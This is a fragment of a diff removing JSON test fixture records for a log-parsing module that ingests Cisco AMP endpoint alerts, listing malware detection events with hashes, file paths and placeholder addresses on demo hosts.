"test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 8000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259135965757000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 74097, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 291000000, - "event.action": "Executed malware", - "event.category": [ - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 1489955900291000600, - 
"event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:17:41.000Z", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "input.type": "log", - "log.offset": 75414, - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:40.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251520740130915", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 3000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251520740131000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": 
"Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 76706, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:39.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251516445163618", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 988000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251516445164000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 78028, - "related.hash": [ - 
"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251512150196266", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 942000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251512150196000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 152159, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - 
"Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259080131182683", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 996000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259080131183000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 187917, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:37.000Z", - "cisco.amp.computer.active": true, - 
"cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6159251507855228943", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 944000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251507855229000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 189236, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:36.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": 
"90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251503560261640", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 821000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251503560262000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 198516, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:25.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259028591575130", - "cisco.amp.event_type_id": 1090519054, - 
"cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 984000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259028591575000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 207155, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:21.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251439135752194", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 455000000, - "event.action": 
"Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251439135752000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 208474, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:14.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258981346934873", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - 
], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 346000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258981346935000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 210041, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:02.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258929807327320", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 334000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258929807327000, - 
"event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 211360, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:56.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668623368585250", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 753000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668623368585000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 212679, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:50.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258878267719767", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 322000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258878267720000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - 
"fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 216643, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258826728112214", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 310000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258826728112000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 217962, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - 
"ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:26.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251202912550913", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 262000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251202912551000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\Windows\\System32\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 219281, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - 
